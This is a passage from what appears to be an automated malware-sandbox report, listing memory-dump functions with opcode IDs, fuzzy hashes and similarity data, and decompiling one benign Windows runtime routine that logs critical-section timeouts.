                                                    • Instruction Fuzzy Hash: 7CE08C72A207859BDF13DB4CC650F5EBBF5FB84B00F150014A5085B620C624AC00CB00
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0122AAB0, Relevance: .0, Instructions: 12COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                    • Instruction ID: 5cad6473b5bead3acacd55b40608f23a701e6a81396d5806aba4111682611778
                                                    • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                    • Instruction Fuzzy Hash: F5D0E935362991DFD617CB1DC564B1A77B5FB44B44FC50490E601CBB62E63DD944CA00
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 012435A1, Relevance: .0, Instructions: 12COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                    • Instruction ID: 19b2220719d1e5fe34ebc9c0244defc8f63f02784287b8e4c139e79643b48c1e
                                                    • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                    • Instruction Fuzzy Hash: B5D02371431192DFDB09FB14E1147FC3771FF04204F581055C10105456C335490DD740
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0121DB40, Relevance: .0, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                    • Instruction ID: 86f87dc7a550bcc3317ac0c77b580b03b34fb5b5332c67ec07ce5012625ed28e
                                                    • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                    • Instruction Fuzzy Hash: F7C08C702A0A42EEEB226F24CD01B103AA0BB60B01F4400A06701DA0F0EB78D902EA00
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0129A537, Relevance: .0, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                    • Instruction ID: 260ca956e9ce8913e7e2057c3fd459c101dbeea4abe70d6b48ed2da09b9286b6
                                                    • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                    • Instruction Fuzzy Hash: 46C08C33080248BBCB126F82CC00F267F2AFBA4B60F008010FA080F570C632E971EB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01233A1C, Relevance: .0, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                    • Instruction ID: 3bb0ef04bdf84adbee01dd6f316680dd0224428ea98a09a267b30db54a8d7d82
                                                    • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                    • Instruction Fuzzy Hash: C4C08C32090688BBC7126E41DC00F117B29E7A0B60F000020BA040A5608532EC60E988
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0121AD30, Relevance: .0, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                    • Instruction ID: 8edb43155e61387a3872a005440b3cddc344ea6bf6581002d69f6de6fb158af6
                                                    • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                    • Instruction Fuzzy Hash: 38C08C72080248BBCB126A45CD00F117B29E7A0B60F000020B6040A6618932E860D588
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 012276E2, Relevance: .0, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                    • Instruction ID: a6b99635396b36283f3903bf162ad6aa3374bf1bbd68cf7cde8f6f45447be2c5
                                                    • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                    • Instruction Fuzzy Hash: DCC08CB01652866EEF3B570DCE20B383A50AB28608F48019CEB02094A2C768A802C208
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 012436CC, Relevance: .0, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                    • Instruction ID: e39c982a9a08a8e7b33966aa83987367ce9df08c55c5ab4841c7732293fdd1bf
                                                    • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                    • Instruction Fuzzy Hash: FEC09BB5175881FFE7196F34CD51F257294F750A61F6407947321455F0D569DC00E504
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01237D50, Relevance: .0, Instructions: 7COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                    • Instruction ID: 369cf1ccd3e6c065c09a3ab657bf95f7626bd646e59ea34fb6aab102bb042561
                                                    • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                    • Instruction Fuzzy Hash: 25B092753119418FCE16DF18C084B1533E4BB84A40F8400D0E400CBA21D329E8008900
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01242ACB, Relevance: .0, Instructions: 5COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                    • Instruction ID: 2f8ee80fe280e0f63a2317e00724e2611c700cbe3fc96c775d962c7898e8f285
                                                    • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                    • Instruction Fuzzy Hash: 86B01233C20451DFCF02EF40C610B6D7331FB00750F064490D00127930C228AC01DB40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01259950, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 822f1d9cd6c326ff1c22a92bb0431e12068eb3fed390c89166efdbc50a079971
                                                    • Instruction ID: 316446014bd18c1f5f8d4aa4e48328708b0fcc68699bfe9bedb73b8f0401f580
                                                    • Opcode Fuzzy Hash: 822f1d9cd6c326ff1c22a92bb0431e12068eb3fed390c89166efdbc50a079971
                                                    • Instruction Fuzzy Hash: C39002A131140C03D14065AA48046070009A7D0342F51C011A2454559ECE698C9172B5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 012599D0, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 19d167172120ba563cb0b13cd95794a9a9a7c0c009c516686dfff3739996aaf2
                                                    • Instruction ID: 1c0284778f7178f12ed0c5b85f110c226f32362c5654831056c4b79860725d37
                                                    • Opcode Fuzzy Hash: 19d167172120ba563cb0b13cd95794a9a9a7c0c009c516686dfff3739996aaf2
                                                    • Instruction Fuzzy Hash: 609002A132100C42D10461AA44047060049A7E1241F51C012A2544558CC9698CA162A5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01259820, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 73333cc612dc828081f1f98e10fcabadf20d3939e2eb2785a685f347b81bdf81
                                                    • Instruction ID: e1888166696dbcc692fbecb11bf75ca2f6ed38cd0dec272b7d0f441d7f82fe38
                                                    • Opcode Fuzzy Hash: 73333cc612dc828081f1f98e10fcabadf20d3939e2eb2785a685f347b81bdf81
                                                    • Instruction Fuzzy Hash: 8490027135100C02D14171AA4404606000DB7D0281F91C012A0814558ECA958A96BBE1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0125B040, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 316f661751c8073e025407c81d838f2a56d2cc2d55036846a50e44d1c7b2c7ba
                                                    • Instruction ID: e85b4b15c0931036808bfb6b056918a3e416845391d6b7d6523a11d14ca974b6
                                                    • Opcode Fuzzy Hash: 316f661751c8073e025407c81d838f2a56d2cc2d55036846a50e44d1c7b2c7ba
                                                    • Instruction Fuzzy Hash: B99002A171114C434540B1AA48044065019B7E1341391C121A0844564CCAA88895A3E5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 012598A0, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2b6d638c7b7b30ca6c8bb5d032e37b07d09f315d828d4df44abb13f72b15f7d8
                                                    • Instruction ID: 3aa5107bca68e924bedc15a901b32a5818ddda36e078c468a031fbda2789cfb3
                                                    • Opcode Fuzzy Hash: 2b6d638c7b7b30ca6c8bb5d032e37b07d09f315d828d4df44abb13f72b15f7d8
                                                    • Instruction Fuzzy Hash: C790026131100C02D10261AA4414606000DE7D1385F91C012E1814559DCA658993B2B2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01259B00, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 69737b6de565bfbbc0f147faa87829aab3aa71f09f509af65771c7bf3a53b441
                                                    • Instruction ID: 158198914eea44d106ce9dcae5361985e882fb9bf89c4bcaad25a4e4fa613a88
                                                    • Opcode Fuzzy Hash: 69737b6de565bfbbc0f147faa87829aab3aa71f09f509af65771c7bf3a53b441
                                                    • Instruction Fuzzy Hash: E490026135100C02D14071AA8414707000AE7D0641F51C011A0414558DCA5689A577F1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0125A3B0, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ce93533f4b48416fd211db381402c87b094c1260485c92396fda0015e01cafe7
                                                    • Instruction ID: ec269962a040148508e8ebaefd4704f7c9c8aafeb75c58a593facf4882925dd1
                                                    • Opcode Fuzzy Hash: ce93533f4b48416fd211db381402c87b094c1260485c92396fda0015e01cafe7
                                                    • Instruction Fuzzy Hash: 8490027131144C02D14071AA844460B5009B7E0341F51C411E0815558CCA558896A3A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01259A10, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fe44479fe8ed7e40dc908aeb3a40ec8a7fee24ced2a162825a5499ac3317167b
                                                    • Instruction ID: 6a4ff86898872baf8ced9ec39435860760eada37d3782e3ac155497d3b1f46c8
                                                    • Opcode Fuzzy Hash: fe44479fe8ed7e40dc908aeb3a40ec8a7fee24ced2a162825a5499ac3317167b
                                                    • Instruction Fuzzy Hash: DC90027131140C02D10061AA48087470009A7D0342F51C011A5554559ECAA5C8D176B1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01259A80, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cb1dccfd360b26e97787858764ab665820aaa925da57372aad9cacb679859f43
                                                    • Instruction ID: 7585dca915e861cfa3d7028ab47547825f2a7bc5ce001a3cead8f753217884f0
                                                    • Opcode Fuzzy Hash: cb1dccfd360b26e97787858764ab665820aaa925da57372aad9cacb679859f43
                                                    • Instruction Fuzzy Hash: 4990026131144C42D14062AA4804B0F4109A7E1242F91C019A4546558CCD55889567A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01259520, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2a0650c144d63df4d442d3f6e8e5ee36e194e228d5ef4419d8cded228604f110
                                                    • Instruction ID: 8f026e37618f8b3b4f1e3ef5be6458b63b111bb1d0799a0e5d7976c37907c3b6
                                                    • Opcode Fuzzy Hash: 2a0650c144d63df4d442d3f6e8e5ee36e194e228d5ef4419d8cded228604f110
                                                    • Instruction Fuzzy Hash: BD9002E131114C924500A2AA8404B0A4509A7E0241B51C016E1444564CC9658891A2B5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0125AD30, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c797e37b65afef83f68ffc345d38e5c25163536f97b60d4409cdad1dca6bc4d4
                                                    • Instruction ID: 186d97e10ac1c9f894c50906d0616ade2a5a72484cdcf2237342d680ec0aed3b
                                                    • Opcode Fuzzy Hash: c797e37b65afef83f68ffc345d38e5c25163536f97b60d4409cdad1dca6bc4d4
                                                    • Instruction Fuzzy Hash: 3A900271B1500C12914071AA4814646400AB7E0781B55C011A0904558CCD948A9563E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01259560, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e6307a5e3b27d7712be478f886d733bf5c3efc7ba7e47678e08f07755d5aaa89
                                                    • Instruction ID: 179e3c336a349ed55cb443caaedbf831c6baf0220af9c20a4e6fd759d42f4a7a
                                                    • Opcode Fuzzy Hash: e6307a5e3b27d7712be478f886d733bf5c3efc7ba7e47678e08f07755d5aaa89
                                                    • Instruction Fuzzy Hash: 5990026533100C020145A5AA060450B0449B7D6391391C015F1806594CCA6188A563A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 012595F0, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3232e3bfaf32a47f48af502c49754c86fc263adeca57c0f8e1b2720f383497f1
                                                    • Instruction ID: b37fa97b134df2047262da75330c0e92c4e4bdcba1ac9628f96d07a4c20782f4
                                                    • Opcode Fuzzy Hash: 3232e3bfaf32a47f48af502c49754c86fc263adeca57c0f8e1b2720f383497f1
                                                    • Instruction Fuzzy Hash: EA90027131100C02D10461AA48046860009A7D0341F51C011A6414659EDAA588D172B1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01259730, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 78e043dfb108d8cc8739be6e016834a52cacccda2137ab1045991e3be071d821
                                                    • Instruction ID: 177629056d08860b0f3fe6d516ff531ce9d7b8ab5dd6bbe986f78efa0f5f94a3
                                                    • Opcode Fuzzy Hash: 78e043dfb108d8cc8739be6e016834a52cacccda2137ab1045991e3be071d821
                                                    • Instruction Fuzzy Hash: C190026171500C02D14071AA54187060019A7D0241F51D011A0414558DCA998A9577E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0125A710, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a631d7bb92dfacb5f60c0717095d17c357212a627c27855bd4d6e1134cb61d74
                                                    • Instruction ID: 85ce925452be244713e9a898bb533b048b5d9be5b9b97196219a91d9c23cca9d
                                                    • Opcode Fuzzy Hash: a631d7bb92dfacb5f60c0717095d17c357212a627c27855bd4d6e1134cb61d74
                                                    • Instruction Fuzzy Hash: DC90027131100C529500A6EA5804A4A4109A7F0341B51D015A4404558CC99488A162A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01259760, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e3ec5abfdb13b8eec578d6b5ed8f19c17ec3b5262dd9b8cfc09b7bab723bfaba
                                                    • Instruction ID: d5f91fac0e3442608fe5100038f18a37e14420a2ea0527a7bdbdc5008b15b824
                                                    • Opcode Fuzzy Hash: e3ec5abfdb13b8eec578d6b5ed8f19c17ec3b5262dd9b8cfc09b7bab723bfaba
                                                    • Instruction Fuzzy Hash: AD90027131100C03D10061AA55087070009A7D0241F51D411A081455CDDA96889172A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0125A770, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 39701f8e673cfd9cb0e84aa3282350ceb1d74d7e2798df6b5af02e48c66a23a0
                                                    • Instruction ID: 8118fc21b599ad648baebb5462cffe5cb6d8442308e6ee0d99f7766fd4d5a492
                                                    • Opcode Fuzzy Hash: 39701f8e673cfd9cb0e84aa3282350ceb1d74d7e2798df6b5af02e48c66a23a0
                                                    • Instruction Fuzzy Hash: EA90027531504C42D50065AA5804A870009A7D0345F51D411A081459CDCA9488A1B2A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01259770, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9ac7165fc11201764a4ad45ac2ba5bb3634bb6c81ea98c39359dd8fac057f307
                                                    • Instruction ID: ba9896112e36080026c9f4402d4e1f851efc571b4842cd745721d317849b5629
                                                    • Opcode Fuzzy Hash: 9ac7165fc11201764a4ad45ac2ba5bb3634bb6c81ea98c39359dd8fac057f307
                                                    • Instruction Fuzzy Hash: 6990026131504C42D10065AA5408A060009A7D0245F51D011A1454599DCA758891B2B1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01259610, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8b848482c5e9fe1e81e6a53dbf947afb67c55d8029662fd02327a1a071ef0d26
                                                    • Instruction ID: ea690b330e0635e63bad505c5811937c7106cdff8738bd401efaeebdcc17e0b7
                                                    • Opcode Fuzzy Hash: 8b848482c5e9fe1e81e6a53dbf947afb67c55d8029662fd02327a1a071ef0d26
                                                    • Instruction Fuzzy Hash: D690027171500C02D15071AA44147460009A7D0341F51C011A0414658DCB958A9577E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01259650, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c944124e588f0324807f3e3edb03a577e06689975d8e81deca402b0354d35e54
                                                    • Instruction ID: 3ff0df1c04a6b14c5235199de237341ca2a5382a46edae9292ad830e9962fdf1
                                                    • Opcode Fuzzy Hash: c944124e588f0324807f3e3edb03a577e06689975d8e81deca402b0354d35e54
                                                    • Instruction Fuzzy Hash: 1B90027131504C42D14071AA4404A460019A7D0345F51C011A0454698DDA658D95B7E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 012596D0, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7d8c246263152c55349c607e16a9a32284bf57b55c3a7308c93d19f9db4a92dc
                                                    • Instruction ID: 21214f987c20ffeb4e5d0bb521778e3f94dc77c225c6bb01441f77f7223d7ea0
                                                    • Opcode Fuzzy Hash: 7d8c246263152c55349c607e16a9a32284bf57b55c3a7308c93d19f9db4a92dc
                                                    • Instruction Fuzzy Hash: 4D90027131100C42D10061AA4404B460009A7E0341F51C016A0514658DCA55C89176A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01259670, Relevance: .0, Instructions: 2COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                    • Instruction ID: 1238c4c7dc65f276e66d78f8a18fc4ef6426ec621217672150ca6e87328e5b57
                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                    • Instruction Fuzzy Hash:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 012AFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 53%
                                                    			E012AFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0125CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E012A5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E012A5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                    0x012afdda
                                                    0x012afde2
                                                    0x012afde5
                                                    0x012afdec
                                                    0x012afdfa
                                                    0x012afdff
                                                    0x012afe0a
                                                    0x012afe0f
                                                    0x012afe17
                                                    0x012afe1e
                                                    0x012afe19
                                                    0x012afe19
                                                    0x012afe19
                                                    0x012afe20
                                                    0x012afe21
                                                    0x012afe22
                                                    0x012afe25
                                                    0x012afe40

                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012AFDFA
                                                    Strings
                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 012AFE2B
                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 012AFE01
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                    • API String ID: 885266447-3903918235
                                                    • Opcode ID: f191ea701f65061844959a3b709ac803f2f3e5cf827a9bac93c2c6e9bab82562
                                                    • Instruction ID: 08198b2e1c2d0173976a140bbc11d6e9a35bd5fdbd06fbe1d65618abef495a9e
                                                    • Opcode Fuzzy Hash: f191ea701f65061844959a3b709ac803f2f3e5cf827a9bac93c2c6e9bab82562
                                                    • Instruction Fuzzy Hash: 4DF0C232210602BBEB251A45DD06F37BF5AEB44B30F240315F728561D1EA62A82096A4
                                                    Uniqueness

